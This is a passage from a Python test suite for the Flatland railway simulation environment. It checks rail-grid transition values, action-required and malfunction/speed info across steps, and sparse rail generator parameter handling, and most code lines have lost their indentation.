assert env.rail.get_full_transitions(14, 23) == 0, "[14][23]"
assert env.rail.get_full_transitions(14, 24) == 0, "[14][24]"
assert env.rail.get_full_transitions(15, 0) == 32800, "[15][0]"
assert env.rail.get_full_transitions(15, 1) == 32800, "[15][1]"
assert env.rail.get_full_transitions(15, 2) == 0, "[15][2]"
assert env.rail.get_full_transitions(15, 3) == 0, "[15][3]"
assert env.rail.get_full_transitions(15, 4) == 0, "[15][4]"
assert env.rail.get_full_transitions(15, 5) == 0, "[15][5]"
assert env.rail.get_full_transitions(15, 6) == 0, "[15][6]"
assert env.rail.get_full_transitions(15, 7) == 0, "[15][7]"
assert env.rail.get_full_transitions(15, 8) == 0, "[15][8]"
assert env.rail.get_full_transitions(15, 9) == 0, "[15][9]"
assert env.rail.get_full_transitions(15, 10) == 0, "[15][10]"
assert env.rail.get_full_transitions(15, 11) == 0, "[15][11]"
assert env.rail.get_full_transitions(15, 12) == 0, "[15][12]"
assert env.rail.get_full_transitions(15, 13) == 0, "[15][13]"
assert env.rail.get_full_transitions(15, 14) == 0, "[15][14]"
assert env.rail.get_full_transitions(15, 15) == 0, "[15][15]"
assert env.rail.get_full_transitions(15, 16) == 0, "[15][16]"
assert env.rail.get_full_transitions(15, 17) == 0, "[15][17]"
assert env.rail.get_full_transitions(15, 18) == 0, "[15][18]"
assert env.rail.get_full_transitions(15, 19) == 32800, "[15][19]"
assert env.rail.get_full_transitions(15, 20) == 32800, "[15][20]"
assert env.rail.get_full_transitions(15, 21) == 32800, "[15][21]"
assert env.rail.get_full_transitions(15, 22) == 0, "[15][22]"
assert env.rail.get_full_transitions(15, 23) == 0, "[15][23]"
assert env.rail.get_full_transitions(15, 24) == 0, "[15][24]"
assert env.rail.get_full_transitions(16, 0) == 32800, "[16][0]"
assert env.rail.get_full_transitions(16, 1) == 32800, "[16][1]"
assert env.rail.get_full_transitions(16, 2) == 0, "[16][2]"
assert env.rail.get_full_transitions(16, 3) == 0, "[16][3]"
assert env.rail.get_full_transitions(16, 4) == 0, "[16][4]"
assert env.rail.get_full_transitions(16, 5) == 0, "[16][5]"
assert env.rail.get_full_transitions(16, 6) == 0, "[16][6]"
assert env.rail.get_full_transitions(16, 7) == 0, "[16][7]"
assert env.rail.get_full_transitions(16, 8) == 0, "[16][8]"
assert env.rail.get_full_transitions(16, 9) == 0, "[16][9]"
assert env.rail.get_full_transitions(16, 10) == 0, "[16][10]"
assert env.rail.get_full_transitions(16, 11) == 0, "[16][11]"
assert env.rail.get_full_transitions(16, 12) == 0, "[16][12]"
assert env.rail.get_full_transitions(16, 13) == 0, "[16][13]"
assert env.rail.get_full_transitions(16, 14) == 0, "[16][14]"
assert env.rail.get_full_transitions(16, 15) == 0, "[16][15]"
assert env.rail.get_full_transitions(16, 16) == 0, "[16][16]"
assert env.rail.get_full_transitions(16, 17) == 0, "[16][17]"
assert env.rail.get_full_transitions(16, 18) == 0, "[16][18]"
assert env.rail.get_full_transitions(16, 19) == 32800, "[16][19]"
assert env.rail.get_full_transitions(16, 20) == 32800, "[16][20]"
assert env.rail.get_full_transitions(16, 21) == 32800, "[16][21]"
assert env.rail.get_full_transitions(16, 22) == 0, "[16][22]"
assert env.rail.get_full_transitions(16, 23) == 0, "[16][23]"
assert env.rail.get_full_transitions(16, 24) == 0, "[16][24]"
assert env.rail.get_full_transitions(17, 0) == 32800, "[17][0]"
assert env.rail.get_full_transitions(17, 1) == 32800, "[17][1]"
assert env.rail.get_full_transitions(17, 2) == 0, "[17][2]"
assert env.rail.get_full_transitions(17, 3) == 0, "[17][3]"
assert env.rail.get_full_transitions(17, 4) == 0, "[17][4]"
assert env.rail.get_full_transitions(17, 5) == 0, "[17][5]"
assert env.rail.get_full_transitions(17, 6) == 0, "[17][6]"
assert env.rail.get_full_transitions(17, 7) == 0, "[17][7]"
assert env.rail.get_full_transitions(17, 8) == 0, "[17][8]"
assert env.rail.get_full_transitions(17, 9) == 0, "[17][9]"
assert env.rail.get_full_transitions(17, 10) == 0, "[17][10]"
assert env.rail.get_full_transitions(17, 11) == 0, "[17][11]"
assert env.rail.get_full_transitions(17, 12) == 0, "[17][12]"
assert env.rail.get_full_transitions(17, 13) == 0, "[17][13]"
assert env.rail.get_full_transitions(17, 14) == 0, "[17][14]"
assert env.rail.get_full_transitions(17, 15) == 0, "[17][15]"
assert env.rail.get_full_transitions(17, 16) == 0, "[17][16]"
assert env.rail.get_full_transitions(17, 17) == 0, "[17][17]"
assert env.rail.get_full_transitions(17, 18) == 0, "[17][18]"
assert env.rail.get_full_transitions(17, 19) == 32800, "[17][19]"
assert env.rail.get_full_transitions(17, 20) == 32800, "[17][20]"
assert env.rail.get_full_transitions(17, 21) == 32800, "[17][21]"
assert env.rail.get_full_transitions(17, 22) == 0, "[17][22]"
assert env.rail.get_full_transitions(17, 23) == 0, "[17][23]"
assert env.rail.get_full_transitions(17, 24) == 0, "[17][24]"
assert env.rail.get_full_transitions(18, 0) == 72, "[18][0]"
assert env.rail.get_full_transitions(18, 1) == 37408, "[18][1]"
assert env.rail.get_full_transitions(18, 2) == 0, "[18][2]"
assert env.rail.get_full_transitions(18, 3) == 0, "[18][3]"
assert env.rail.get_full_transitions(18, 4) == 0, "[18][4]"
assert env.rail.get_full_transitions(18, 5) == 0, "[18][5]"
assert env.rail.get_full_transitions(18, 6) == 0, "[18][6]"
assert env.rail.get_full_transitions(18, 7) == 0, "[18][7]"
assert env.rail.get_full_transitions(18, 8) == 0, "[18][8]"
assert env.rail.get_full_transitions(18, 9) == 0, "[18][9]"
assert env.rail.get_full_transitions(18, 10) == 0, "[18][10]"
assert env.rail.get_full_transitions(18, 11) == 0, "[18][11]"
assert env.rail.get_full_transitions(18, 12) == 0, "[18][12]"
assert env.rail.get_full_transitions(18, 13) == 0, "[18][13]"
assert env.rail.get_full_transitions(18, 14) == 0, "[18][14]"
assert env.rail.get_full_transitions(18, 15) == 0, "[18][15]"
assert env.rail.get_full_transitions(18, 16) == 0, "[18][16]"
assert env.rail.get_full_transitions(18, 17) == 0, "[18][17]"
assert env.rail.get_full_transitions(18, 18) == 0, "[18][18]"
assert env.rail.get_full_transitions(18, 19) == 32800, "[18][19]"
assert env.rail.get_full_transitions(18, 20) == 32800, "[18][20]"
assert env.rail.get_full_transitions(18, 21) == 32800, "[18][21]"
assert env.rail.get_full_transitions(18, 22) == 0, "[18][22]"
assert env.rail.get_full_transitions(18, 23) == 0, "[18][23]"
assert env.rail.get_full_transitions(18, 24) == 0, "[18][24]"
assert env.rail.get_full_transitions(19, 0) == 0, "[19][0]"
assert env.rail.get_full_transitions(19, 1) == 32800, "[19][1]"
assert env.rail.get_full_transitions(19, 2) == 0, "[19][2]"
assert env.rail.get_full_transitions(19, 3) == 0, "[19][3]"
assert env.rail.get_full_transitions(19, 4) == 0, "[19][4]"
assert env.rail.get_full_transitions(19, 5) == 0, "[19][5]"
assert env.rail.get_full_transitions(19, 6) == 0, "[19][6]"
assert env.rail.get_full_transitions(19, 7) == 0, "[19][7]"
assert env.rail.get_full_transitions(19, 8) == 0, "[19][8]"
assert env.rail.get_full_transitions(19, 9) == 0, "[19][9]"
assert env.rail.get_full_transitions(19, 10) == 0, "[19][10]"
assert env.rail.get_full_transitions(19, 11) == 0, "[19][11]"
assert env.rail.get_full_transitions(19, 12) == 0, "[19][12]"
assert env.rail.get_full_transitions(19, 13) == 0, "[19][13]"
assert env.rail.get_full_transitions(19, 14) == 16386, "[19][14]"
assert env.rail.get_full_transitions(19, 15) == 1025, "[19][15]"
assert env.rail.get_full_transitions(19, 16) == 1025, "[19][16]"
assert env.rail.get_full_transitions(19, 17) == 1025, "[19][17]"
assert env.rail.get_full_transitions(19, 18) == 1025, "[19][18]"
assert env.rail.get_full_transitions(19, 19) == 37408, "[19][19]"
assert env.rail.get_full_transitions(19, 20) == 32800, "[19][20]"
assert env.rail.get_full_transitions(19, 21) == 32800, "[19][21]"
assert env.rail.get_full_transitions(19, 22) == 0, "[19][22]"
assert env.rail.get_full_transitions(19, 23) == 0, "[19][23]"
assert env.rail.get_full_transitions(19, 24) == 0, "[19][24]"
assert env.rail.get_full_transitions(20, 0) == 0, "[20][0]"
assert env.rail.get_full_transitions(20, 1) == 32800, "[20][1]"
assert env.rail.get_full_transitions(20, 2) == 0, "[20][2]"
assert env.rail.get_full_transitions(20, 3) == 0, "[20][3]"
assert env.rail.get_full_transitions(20, 4) == 0, "[20][4]"
assert env.rail.get_full_transitions(20, 5) == 0, "[20][5]"
assert env.rail.get_full_transitions(20, 6) == 0, "[20][6]"
assert env.rail.get_full_transitions(20, 7) == 0, "[20][7]"
assert env.rail.get_full_transitions(20, 8) == 0, "[20][8]"
assert env.rail.get_full_transitions(20, 9) == 0, "[20][9]"
assert env.rail.get_full_transitions(20, 10) == 0, "[20][10]"
assert env.rail.get_full_transitions(20, 11) == 0, "[20][11]"
assert env.rail.get_full_transitions(20, 12) == 0, "[20][12]"
assert env.rail.get_full_transitions(20, 13) == 0, "[20][13]"
assert env.rail.get_full_transitions(20, 14) == 32800, "[20][14]"
assert env.rail.get_full_transitions(20, 15) == 0, "[20][15]"
assert env.rail.get_full_transitions(20, 16) == 0, "[20][16]"
assert env.rail.get_full_transitions(20, 17) == 0, "[20][17]"
assert env.rail.get_full_transitions(20, 18) == 0, "[20][18]"
assert env.rail.get_full_transitions(20, 19) == 32800, "[20][19]"
assert env.rail.get_full_transitions(20, 20) == 32800, "[20][20]"
assert env.rail.get_full_transitions(20, 21) == 32800, "[20][21]"
assert env.rail.get_full_transitions(20, 22) == 0, "[20][22]"
assert env.rail.get_full_transitions(20, 23) == 0, "[20][23]"
assert env.rail.get_full_transitions(20, 24) == 0, "[20][24]"
assert env.rail.get_full_transitions(21, 0) == 0, "[21][0]"
assert env.rail.get_full_transitions(21, 1) == 32800, "[21][1]"
assert env.rail.get_full_transitions(21, 2) == 0, "[21][2]"
assert env.rail.get_full_transitions(21, 3) == 0, "[21][3]"
assert env.rail.get_full_transitions(21, 4) == 0, "[21][4]"
assert env.rail.get_full_transitions(21, 5) == 0, "[21][5]"
assert env.rail.get_full_transitions(21, 6) == 0, "[21][6]"
assert env.rail.get_full_transitions(21, 7) == 0, "[21][7]"
assert env.rail.get_full_transitions(21, 8) == 0, "[21][8]"
assert env.rail.get_full_transitions(21, 9) == 0, "[21][9]"
assert env.rail.get_full_transitions(21, 10) == 0, "[21][10]"
assert env.rail.get_full_transitions(21, 11) == 0, "[21][11]"
assert env.rail.get_full_transitions(21, 12) == 0, "[21][12]"
assert env.rail.get_full_transitions(21, 13) == 0, "[21][13]"
assert env.rail.get_full_transitions(21, 14) == 32800, "[21][14]"
assert env.rail.get_full_transitions(21, 15) == 0, "[21][15]"
assert env.rail.get_full_transitions(21, 16) == 0, "[21][16]"
assert env.rail.get_full_transitions(21, 17) == 0, "[21][17]"
assert env.rail.get_full_transitions(21, 18) == 0, "[21][18]"
assert env.rail.get_full_transitions(21, 19) == 32872, "[21][19]"
assert env.rail.get_full_transitions(21, 20) == 37408, "[21][20]"
assert env.rail.get_full_transitions(21, 21) == 32800, "[21][21]"
assert env.rail.get_full_transitions(21, 22) == 0, "[21][22]"
assert env.rail.get_full_transitions(21, 23) == 0, "[21][23]"
assert env.rail.get_full_transitions(21, 24) == 0, "[21][24]"
assert env.rail.get_full_transitions(22, 0) == 0, "[22][0]"
assert env.rail.get_full_transitions(22, 1) == 32800, "[22][1]"
assert env.rail.get_full_transitions(22, 2) == 0, "[22][2]"
assert env.rail.get_full_transitions(22, 3) == 0, "[22][3]"
assert env.rail.get_full_transitions(22, 4) == 0, "[22][4]"
assert env.rail.get_full_transitions(22, 5) == 0, "[22][5]"
assert env.rail.get_full_transitions(22, 6) == 0, "[22][6]"
assert env.rail.get_full_transitions(22, 7) == 0, "[22][7]"
assert env.rail.get_full_transitions(22, 8) == 0, "[22][8]"
assert env.rail.get_full_transitions(22, 9) == 0, "[22][9]"
assert env.rail.get_full_transitions(22, 10) == 0, "[22][10]"
assert env.rail.get_full_transitions(22, 11) == 0, "[22][11]"
assert env.rail.get_full_transitions(22, 12) == 0, "[22][12]"
assert env.rail.get_full_transitions(22, 13) == 0, "[22][13]"
assert env.rail.get_full_transitions(22, 14) == 32800, "[22][14]"
assert env.rail.get_full_transitions(22, 15) == 0, "[22][15]"
assert env.rail.get_full_transitions(22, 16) == 0, "[22][16]"
assert env.rail.get_full_transitions(22, 17) == 0, "[22][17]"
assert env.rail.get_full_transitions(22, 18) == 0, "[22][18]"
assert env.rail.get_full_transitions(22, 19) == 49186, "[22][19]"
assert env.rail.get_full_transitions(22, 20) == 34864, "[22][20]"
assert env.rail.get_full_transitions(22, 21) == 32800, "[22][21]"
assert env.rail.get_full_transitions(22, 22) == 0, "[22][22]"
assert env.rail.get_full_transitions(22, 23) == 0, "[22][23]"
assert env.rail.get_full_transitions(22, 24) == 0, "[22][24]"
assert env.rail.get_full_transitions(23, 0) == 0, "[23][0]"
assert env.rail.get_full_transitions(23, 1) == 32800, "[23][1]"
assert env.rail.get_full_transitions(23, 2) == 0, "[23][2]"
assert env.rail.get_full_transitions(23, 3) == 0, "[23][3]"
assert env.rail.get_full_transitions(23, 4) == 0, "[23][4]"
assert env.rail.get_full_transitions(23, 5) == 16386, "[23][5]"
assert env.rail.get_full_transitions(23, 6) == 1025, "[23][6]"
assert env.rail.get_full_transitions(23, 7) == 4608, "[23][7]"
assert env.rail.get_full_transitions(23, 8) == 0, "[23][8]"
assert env.rail.get_full_transitions(23, 9) == 0, "[23][9]"
assert env.rail.get_full_transitions(23, 10) == 0, "[23][10]"
assert env.rail.get_full_transitions(23, 11) == 0, "[23][11]"
assert env.rail.get_full_transitions(23, 12) == 0, "[23][12]"
assert env.rail.get_full_transitions(23, 13) == 0, "[23][13]"
assert env.rail.get_full_transitions(23, 14) == 32800, "[23][14]"
assert env.rail.get_full_transitions(23, 15) == 0, "[23][15]"
assert env.rail.get_full_transitions(23, 16) == 0, "[23][16]"
assert env.rail.get_full_transitions(23, 17) == 0, "[23][17]"
assert env.rail.get_full_transitions(23, 18) == 0, "[23][18]"
assert env.rail.get_full_transitions(23, 19) == 32800, "[23][19]"
assert env.rail.get_full_transitions(23, 20) == 32872, "[23][20]"
assert env.rail.get_full_transitions(23, 21) == 37408, "[23][21]"
assert env.rail.get_full_transitions(23, 22) == 0, "[23][22]"
assert env.rail.get_full_transitions(23, 23) == 0, "[23][23]"
assert env.rail.get_full_transitions(23, 24) == 0, "[23][24]"
assert env.rail.get_full_transitions(24, 0) == 0, "[24][0]"
assert env.rail.get_full_transitions(24, 1) == 72, "[24][1]"
assert env.rail.get_full_transitions(24, 2) == 1025, "[24][2]"
assert env.rail.get_full_transitions(24, 3) == 5633, "[24][3]"
assert env.rail.get_full_transitions(24, 4) == 17411, "[24][4]"
assert env.rail.get_full_transitions(24, 5) == 3089, "[24][5]"
assert env.rail.get_full_transitions(24, 6) == 1025, "[24][6]"
assert env.rail.get_full_transitions(24, 7) == 1097, "[24][7]"
assert env.rail.get_full_transitions(24, 8) == 5633, "[24][8]"
assert env.rail.get_full_transitions(24, 9) == 17411, "[24][9]"
assert env.rail.get_full_transitions(24, 10) == 1025, "[24][10]"
assert env.rail.get_full_transitions(24, 11) == 5633, "[24][11]"
assert env.rail.get_full_transitions(24, 12) == 1025, "[24][12]"
assert env.rail.get_full_transitions(24, 13) == 1025, "[24][13]"
assert env.rail.get_full_transitions(24, 14) == 2064, "[24][14]"
assert env.rail.get_full_transitions(24, 15) == 0, "[24][15]"
assert env.rail.get_full_transitions(24, 16) == 0, "[24][16]"
assert env.rail.get_full_transitions(24, 17) == 0, "[24][17]"
assert env.rail.get_full_transitions(24, 18) == 0, "[24][18]"
assert env.rail.get_full_transitions(24, 19) == 32800, "[24][19]"
assert env.rail.get_full_transitions(24, 20) == 32800, "[24][20]"
assert env.rail.get_full_transitions(24, 21) == 32800, "[24][21]"
assert env.rail.get_full_transitions(24, 22) == 0, "[24][22]"
assert env.rail.get_full_transitions(24, 23) == 0, "[24][23]"
assert env.rail.get_full_transitions(24, 24) == 0, "[24][24]"
assert env.rail.get_full_transitions(25, 0) == 0, "[25][0]"
assert env.rail.get_full_transitions(25, 1) == 0, "[25][1]"
assert env.rail.get_full_transitions(25, 2) == 0, "[25][2]"
assert env.rail.get_full_transitions(25, 3) == 72, "[25][3]"
assert env.rail.get_full_transitions(25, 4) == 3089, "[25][4]"
assert env.rail.get_full_transitions(25, 5) == 5633, "[25][5]"
assert env.rail.get_full_transitions(25, 6) == 1025, "[25][6]"
assert env.rail.get_full_transitions(25, 7) == 17411, "[25][7]"
assert env.rail.get_full_transitions(25, 8) == 1097, "[25][8]"
assert env.rail.get_full_transitions(25, 9) == 2064, "[25][9]"
assert env.rail.get_full_transitions(25, 10) == 0, "[25][10]"
assert env.rail.get_full_transitions(25, 11) == 32872, "[25][11]"
assert env.rail.get_full_transitions(25, 12) == 5633, "[25][12]"
assert env.rail.get_full_transitions(25, 13) == 4608, "[25][13]"
assert env.rail.get_full_transitions(25, 14) == 0, "[25][14]"
assert env.rail.get_full_transitions(25, 15) == 0, "[25][15]"
assert env.rail.get_full_transitions(25, 16) == 0, "[25][16]"
assert env.rail.get_full_transitions(25, 17) == 0, "[25][17]"
assert env.rail.get_full_transitions(25, 18) == 0, "[25][18]"
assert env.rail.get_full_transitions(25, 19) == 32800, "[25][19]"
assert env.rail.get_full_transitions(25, 20) == 49186, "[25][20]"
assert env.rail.get_full_transitions(25, 21) == 34864, "[25][21]"
assert env.rail.get_full_transitions(25, 22) == 0, "[25][22]"
assert env.rail.get_full_transitions(25, 23) == 0, "[25][23]"
assert env.rail.get_full_transitions(25, 24) == 0, "[25][24]"
assert env.rail.get_full_transitions(26, 0) == 0, "[26][0]"
assert env.rail.get_full_transitions(26, 1) == 0, "[26][1]"
assert env.rail.get_full_transitions(26, 2) == 0, "[26][2]"
assert env.rail.get_full_transitions(26, 3) == 0, "[26][3]"
assert env.rail.get_full_transitions(26, 4) == 0, "[26][4]"
assert env.rail.get_full_transitions(26, 5) == 72, "[26][5]"
assert env.rail.get_full_transitions(26, 6) == 1025, "[26][6]"
assert env.rail.get_full_transitions(26, 7) == 2064, "[26][7]"
assert env.rail.get_full_transitions(26, 8) == 0, "[26][8]"
assert env.rail.get_full_transitions(26, 9) == 0, "[26][9]"
assert env.rail.get_full_transitions(26, 10) == 0, "[26][10]"
assert env.rail.get_full_transitions(26, 11) == 32800, "[26][11]"
assert env.rail.get_full_transitions(26, 12) == 32800, "[26][12]"
assert env.rail.get_full_transitions(26, 13) == 32800, "[26][13]"
assert env.rail.get_full_transitions(26, 14) == 0, "[26][14]"
assert env.rail.get_full_transitions(26, 15) == 0, "[26][15]"
assert env.rail.get_full_transitions(26, 16) == 0, "[26][16]"
assert env.rail.get_full_transitions(26, 17) == 0, "[26][17]"
assert env.rail.get_full_transitions(26, 18) == 0, "[26][18]"
assert env.rail.get_full_transitions(26, 19) == 32872, "[26][19]"
assert env.rail.get_full_transitions(26, 20) == 37408, "[26][20]"
assert env.rail.get_full_transitions(26, 21) == 32800, "[26][21]"
assert env.rail.get_full_transitions(26, 22) == 0, "[26][22]"
assert env.rail.get_full_transitions(26, 23) == 0, "[26][23]"
assert env.rail.get_full_transitions(26, 24) == 0, "[26][24]"
assert env.rail.get_full_transitions(27, 0) == 0, "[27][0]"
assert env.rail.get_full_transitions(27, 1) == 0, "[27][1]"
assert env.rail.get_full_transitions(27, 2) == 0, "[27][2]"
assert env.rail.get_full_transitions(27, 3) == 0, "[27][3]"
assert env.rail.get_full_transitions(27, 4) == 0, "[27][4]"
assert env.rail.get_full_transitions(27, 5) == 0, "[27][5]"
assert env.rail.get_full_transitions(27, 6) == 0, "[27][6]"
assert env.rail.get_full_transitions(27, 7) == 0, "[27][7]"
assert env.rail.get_full_transitions(27, 8) == 0, "[27][8]"
assert env.rail.get_full_transitions(27, 9) == 0, "[27][9]"
assert env.rail.get_full_transitions(27, 10) == 0, "[27][10]"
assert env.rail.get_full_transitions(27, 11) == 32800, "[27][11]"
assert env.rail.get_full_transitions(27, 12) == 32800, "[27][12]"
assert env.rail.get_full_transitions(27, 13) == 72, "[27][13]"
assert env.rail.get_full_transitions(27, 14) == 4608, "[27][14]"
assert env.rail.get_full_transitions(27, 15) == 0, "[27][15]"
assert env.rail.get_full_transitions(27, 16) == 0, "[27][16]"
assert env.rail.get_full_transitions(27, 17) == 0, "[27][17]"
assert env.rail.get_full_transitions(27, 18) == 0, "[27][18]"
assert env.rail.get_full_transitions(27, 19) == 49186, "[27][19]"
assert env.rail.get_full_transitions(27, 20) == 34864, "[27][20]"
assert env.rail.get_full_transitions(27, 21) == 32800, "[27][21]"
assert env.rail.get_full_transitions(27, 22) == 0, "[27][22]"
assert env.rail.get_full_transitions(27, 23) == 0, "[27][23]"
assert env.rail.get_full_transitions(27, 24) == 0, "[27][24]"
assert env.rail.get_full_transitions(28, 0) == 0, "[28][0]"
assert env.rail.get_full_transitions(28, 1) == 0, "[28][1]"
assert env.rail.get_full_transitions(28, 2) == 0, "[28][2]"
assert env.rail.get_full_transitions(28, 3) == 0, "[28][3]"
assert env.rail.get_full_transitions(28, 4) == 0, "[28][4]"
assert env.rail.get_full_transitions(28, 5) == 0, "[28][5]"
assert env.rail.get_full_transitions(28, 6) == 0, "[28][6]"
assert env.rail.get_full_transitions(28, 7) == 0, "[28][7]"
assert env.rail.get_full_transitions(28, 8) == 0, "[28][8]"
assert env.rail.get_full_transitions(28, 9) == 0, "[28][9]"
assert env.rail.get_full_transitions(28, 10) == 0, "[28][10]"
assert env.rail.get_full_transitions(28, 11) == 32800, "[28][11]"
assert env.rail.get_full_transitions(28, 12) == 72, "[28][12]"
assert env.rail.get_full_transitions(28, 13) == 1025, "[28][13]"
assert env.rail.get_full_transitions(28, 14) == 37408, "[28][14]"
assert env.rail.get_full_transitions(28, 15) == 0, "[28][15]"
assert env.rail.get_full_transitions(28, 16) == 0, "[28][16]"
assert env.rail.get_full_transitions(28, 17) == 0, "[28][17]"
assert env.rail.get_full_transitions(28, 18) == 0, "[28][18]"
assert env.rail.get_full_transitions(28, 19) == 32800, "[28][19]"
assert env.rail.get_full_transitions(28, 20) == 32800, "[28][20]"
assert env.rail.get_full_transitions(28, 21) == 32800, "[28][21]"
assert env.rail.get_full_transitions(28, 22) == 0, "[28][22]"
assert env.rail.get_full_transitions(28, 23) == 0, "[28][23]"
assert env.rail.get_full_transitions(28, 24) == 0, "[28][24]"
assert env.rail.get_full_transitions(29, 0) == 0, "[29][0]"
assert env.rail.get_full_transitions(29, 1) == 0, "[29][1]"
assert env.rail.get_full_transitions(29, 2) == 0, "[29][2]"
assert env.rail.get_full_transitions(29, 3) == 0, "[29][3]"
assert env.rail.get_full_transitions(29, 4) == 0, "[29][4]"
assert env.rail.get_full_transitions(29, 5) == 0, "[29][5]"
assert env.rail.get_full_transitions(29, 6) == 0, "[29][6]"
assert env.rail.get_full_transitions(29, 7) == 0, "[29][7]"
assert env.rail.get_full_transitions(29, 8) == 0, "[29][8]"
assert env.rail.get_full_transitions(29, 9) == 0, "[29][9]"
assert env.rail.get_full_transitions(29, 10) == 0, "[29][10]"
assert env.rail.get_full_transitions(29, 11) == 72, "[29][11]"
assert env.rail.get_full_transitions(29, 12) == 1025, "[29][12]"
assert env.rail.get_full_transitions(29, 13) == 1025, "[29][13]"
assert env.rail.get_full_transitions(29, 14) == 1097, "[29][14]"
assert env.rail.get_full_transitions(29, 15) == 1025, "[29][15]"
assert env.rail.get_full_transitions(29, 16) == 1025, "[29][16]"
assert env.rail.get_full_transitions(29, 17) == 1025, "[29][17]"
assert env.rail.get_full_transitions(29, 18) == 1025, "[29][18]"
assert env.rail.get_full_transitions(29, 19) == 3089, "[29][19]"
assert env.rail.get_full_transitions(29, 20) == 3089, "[29][20]"
assert env.rail.get_full_transitions(29, 21) == 2064, "[29][21]"
assert env.rail.get_full_transitions(29, 22) == 0, "[29][22]"
assert env.rail.get_full_transitions(29, 23) == 0, "[29][23]"
assert env.rail.get_full_transitions(29, 24) == 0, "[29][24]"
def test_rail_env_action_required_info():
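    """Check that supplying actions only when info['action_required'] is set produces the same
    observations, rewards and dones as supplying an action for every agent at every step."""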
speed_ration_map = {1.: 0.25, # Fast passenger train
1. / 2.: 0.25, # Fast freight train
1. / 3.: 0.25, # Slow commuter train
1. / 4.: 0.25} # Slow freight train
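    # Build two identically seeded environments: one always receives actions, the other only
    # when 'action_required' is set for an agent.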
env_always_action = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(
max_num_cities=10,
max_rails_between_cities=3,
seed=5, # Random seed
        grid_mode=False  # Random distribution of city nodes
), schedule_generator=sparse_schedule_generator(speed_ration_map), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv(), remove_agents_at_target=False)
env_only_if_action_required = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(
max_num_cities=10,
max_rails_between_cities=3,
seed=5, # Random seed
        grid_mode=False  # Random distribution of city nodes
), schedule_generator=sparse_schedule_generator(speed_ration_map), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv(), remove_agents_at_target=False)
env_renderer = RenderTool(env_always_action, gl="PILSVG", )
# Reset the envs
env_always_action.reset(False, False, True, random_seed=5)
env_only_if_action_required.reset(False, False, True, random_seed=5)
assert env_only_if_action_required.rail.grid.tolist() == env_always_action.rail.grid.tolist()
for step in range(50):
print("step {}".format(step))
action_dict_always_action = dict()
action_dict_only_if_action_required = dict()
        # Choose an action for each agent in the environment
for a in range(env_always_action.get_num_agents()):
action = np.random.choice(np.arange(4))
action_dict_always_action.update({a: action})
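            # On the very first step no info dict is available yet, so every agent gets an
            # action; afterwards an action is supplied only when 'action_required' is set.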
if step == 0 or info_only_if_action_required['action_required'][a]:
action_dict_only_if_action_required.update({a: action})
else:
print("[{}] not action_required {}, speed_data={}".format(step, a,
env_always_action.agents[a].speed_data))
obs_always_action, rewards_always_action, done_always_action, info_always_action = env_always_action.step(
action_dict_always_action)
obs_only_if_action_required, rewards_only_if_action_required, done_only_if_action_required, info_only_if_action_required = env_only_if_action_required.step(
action_dict_only_if_action_required)
for a in range(env_always_action.get_num_agents()):
assert len(obs_always_action[a]) == len(obs_only_if_action_required[a])
for i in range(len(obs_always_action[a])):
assert len(obs_always_action[a][i]) == len(obs_only_if_action_required[a][i])
equal = np.array_equal(obs_always_action[a][i], obs_only_if_action_required[a][i])
if not equal:
for r in range(50):
for c in range(50):
assert np.array_equal(obs_always_action[a][i][(r, c)], obs_only_if_action_required[a][i][
(r, c)]), "[{}] a={},i={},{}\n{}\n\nvs.\n\n{}".format(step, a, i, (r, c),
obs_always_action[a][i][(r, c)],
obs_only_if_action_required[a][
i][(r, c)])
assert equal, \
"[{}] [{}][{}] {} vs. {}".format(step, a, i, obs_always_action[a][i],
obs_only_if_action_required[a][i])
assert np.array_equal(rewards_always_action[a], rewards_only_if_action_required[a])
assert np.array_equal(done_always_action[a], done_only_if_action_required[a])
assert info_always_action['action_required'][a] == info_only_if_action_required['action_required'][a]
env_renderer.render_env(show=True, show_observations=False, show_predictions=False)
if done_always_action['__all__']:
break
env_renderer.close_window()
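# A minimal illustrative sketch (not part of the original test suite) of how
# the 'action_required' flag verified above could drive a control loop:
# agents are only asked for a new action on the steps where the environment
# says one is required. `policy` is a hypothetical callable mapping an agent
# handle to a discrete action; all other names are assumed to be the ones
# already imported in this module.
def _sketch_act_only_when_required(env, policy, max_steps=50):
    env.reset(False, False, True)
    info = None
    for _ in range(max_steps):
        action_dict = {}
        for a in range(env.get_num_agents()):
            # On the very first step there is no info dict yet, so every
            # agent receives an action; afterwards only flagged agents do.
            if info is None or info['action_required'][a]:
                action_dict[a] = policy(a)
        obs, rewards, done, info = env.step(action_dict)
        if done['__all__']:
            break
    return rewards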
def test_rail_env_malfunction_speed_info():
env = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(max_num_cities=10,
max_rails_between_cities=3,
seed=5,
grid_mode=False
),
schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv())
env.reset(False, False, True)
env_renderer = RenderTool(env, gl="PILSVG", )
for step in range(100):
action_dict = dict()
# Chose an action for each agent in the environment
for a in range(env.get_num_agents()):
action = np.random.choice(np.arange(4))
action_dict.update({a: action})
obs, rewards, done, info = env.step(
action_dict)
assert 'malfunction' in info
for a in range(env.get_num_agents()):
assert info['malfunction'][a] >= 0
assert info['speed'][a] >= 0 and info['speed'][a] <= 1
assert info['speed'][a] == env.agents[a].speed_data['speed']
env_renderer.render_env(show=True, show_observations=False, show_predictions=False)
if done['__all__']:
break
env_renderer.close_window()
def test_sparse_generator_with_too_man_cities_does_not_break_down():
RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(
max_num_cities=100,
max_rails_between_cities=3,
seed=5,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10, obs_builder_object=GlobalObsForRailEnv())
def test_sparse_generator_with_illegal_params_aborts():
"""
Test that the constructor aborts if the initial parameters don't allow more than one city to be built.
"""
with unittest.TestCase.assertRaises(test_sparse_generator_with_illegal_params_aborts, SystemExit):
RailEnv(width=6, height=6, rail_generator=sparse_rail_generator(
max_num_cities=100,
max_rails_between_cities=3,
seed=5,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv()).reset()
with unittest.TestCase.assertRaises(test_sparse_generator_with_illegal_params_aborts, SystemExit):
RailEnv(width=60, height=60, rail_generator=sparse_rail_generator(
max_num_cities=1,
max_rails_between_cities=3,
seed=5,
grid_mode=False
), schedule_generator=sparse_schedule_generator(), number_of_agents=10,
